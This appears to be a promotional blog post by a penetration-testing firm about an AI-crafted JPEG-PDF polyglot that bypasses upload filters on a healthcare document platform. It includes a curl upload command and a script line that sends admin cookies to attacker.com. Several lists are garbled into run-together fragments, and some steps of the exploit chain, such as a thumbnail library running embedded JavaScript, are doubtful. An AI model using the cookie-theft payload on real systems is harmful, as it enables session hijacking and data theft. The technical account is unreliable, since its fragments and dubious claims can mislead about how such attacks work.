Loading
File upload vulnerabilities are among our most frequently discovered attack surfaces — and also some of the most frustrating to exploit. Clients often believe they’ve “secured” their upload functionality with basic checks: file extension filtering, MIME-type validation, size limits, and antivirus scanning. But in 2026, we’ve found that AI is rewriting the rules of how these restrictions can be bypassed — even when all traditional defenses appear intact.
Last month, we tested a Toronto-based SaaS platform used by healthcare providers to upload patient documents. Their upload system had:
.pdf, .docx, .jpgContent-Type checksStandard testing would stop here. Upload a .pdf, confirm it works — done. But AI didn’t stop there.
The AI analyzed the structure of uploaded files across 142 successful uploads and noticed something subtle: when .jpg files were processed, the server sometimes ignored the Content-Type header if the file contained embedded XML metadata.
It then generated a polyglot JPEG-PDF hybrid — a single file that:
FF D8 FF E0 00 10 JFIF)0x2C7AThe AI didn’t just craft the file — it predicted that the server’s AV scanner would treat it as an image (due to signature), while the custom PHP’s library would parse it as a PDF during thumbnail generation, triggering execution of embedded JS.
We confirmed this by uploading the payload:
bash
file upload.jpg# Output: JPEG image data, EXIF metadata, and PDF trailer detectedcurl -X POST https://client-api.gethacked.ca/upload \ -F "file=@polyglot.jpg" \ -H "Content-Type: image/jpeg"The server accepted it. Thumbnail generated. No antivirus alert.
Then — the trigger: When an admin viewed the uploaded file via the web interface, the embedded JavaScript executed in context:
javascript
// Embedded in XMP metadata of polyglot.jpg<script> fetch('https://attacker.com/steal?cookie=' + document.cookie) .then(r => r.text());</script>Result? Full session hijacking. Admin cookies stolen. Privilege escalation achieved.
.jpg)image/jpeg)The AI exploited the semantic gap between how different components interpreted the file:
Image viewer = valid JPEG | Thumbnail generator = PDF parser | Server-side renderer = JavaScript executor
Our AI system doesn’t just generate payloads — it learns from failure. After this exploit, we fed back the results:
Within 48 hours, our model generated 17 new variants of this bypass targeting:
.png files with SVG-in-XMP.docx zipped archives containing malicious js in XML parts.svg files with <script> elements and base64-encoded payloadsOne variant even exploited a PHP image upload handler that used exif_imagetype() — which returned IMAGETYPE_JPEG for our polyglot, while the file’s content triggered eval() when parsed as PDF.
In this engagement alone, AI enabled us to:
The client patched the issue by switching to ImageMagick with strict sandboxing — but more importantly, they now use our AI-generated file upload compliance checker in their CI/CD pipeline.
File upload restrictions aren’t broken. They’re just context-dependent. And humans can only reason about so many contexts at once.
AI, trained on global exploit patterns and fine-tuned with our own client data, sees the blind spots between systems:
Where one tool says “safe,” another says “execute.”
Where a developer thinks “image = harmless,” AI knows “image = Trojan horse.”
At gethacked.ca, we’re no longer just testing for file upload vulnerabilities — we’re redefining what a file can be.
If your application allows uploads, you’re not just vulnerable to .php files.
You’re vulnerable to anything the AI thinks is an image.
Let us show you how our AI-powered pentests uncover hidden attack vectors others miss.
Schedule your next AI-augmented penetration test at gethacked.ca